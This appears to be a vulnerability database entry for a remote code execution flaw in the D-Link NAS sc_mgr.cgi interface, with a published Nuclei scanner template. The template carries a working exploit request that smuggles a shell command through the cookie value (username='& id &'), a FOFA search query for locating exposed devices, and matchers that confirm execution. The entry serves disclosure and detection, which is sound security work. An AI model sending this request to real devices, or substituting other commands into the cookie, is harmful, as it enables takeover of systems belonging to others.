漏洞描述
The D-Link NAS interface sc_mgr.cgi contains a command execution vulnerability that allows attackers to execute arbitrary commands on the device, potentially leading to unauthorized access or control over the system.
dlink-nas-rce: D-Link NAS `sc_mgr.cgi` - Remote Code Execution
PoC代码[已公开]
id: dlink-nas-rce
info:
name: D-Link NAS `sc_mgr.cgi` - Remote Code Execution
author: adeljck
severity: critical
description: |
The D-Link NAS interface sc_mgr.cgi contains a command execution vulnerability that allows attackers to execute arbitrary commands on the device, potentially leading to unauthorized access or control over the system.
remediation: |
To remediate this vulnerability, ensure that the device firmware is updated to the latest version provided by the manufacturer. Additionally, consider implementing network segmentation and firewall rules to restrict unauthorized access to the device.
metadata:
verified: true
max-request: 1
fofa-query: 'body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info"'
tags: dlink,nas,rce,vuln
http:
- raw:
- |
GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1
Host: {{Hostname}}
Cookie: username='& id &';
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- "404 not found"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100e02550ff4143a026d7f244bd9910cd7231bc3f3caeffcc290fc77cbed1b0712a0220590cbcc5ecc6b49af94437d773a38efe02e13978ce90a2cf8343a7bc5f3e541a:922c64590222798bb761d5b6d8e72950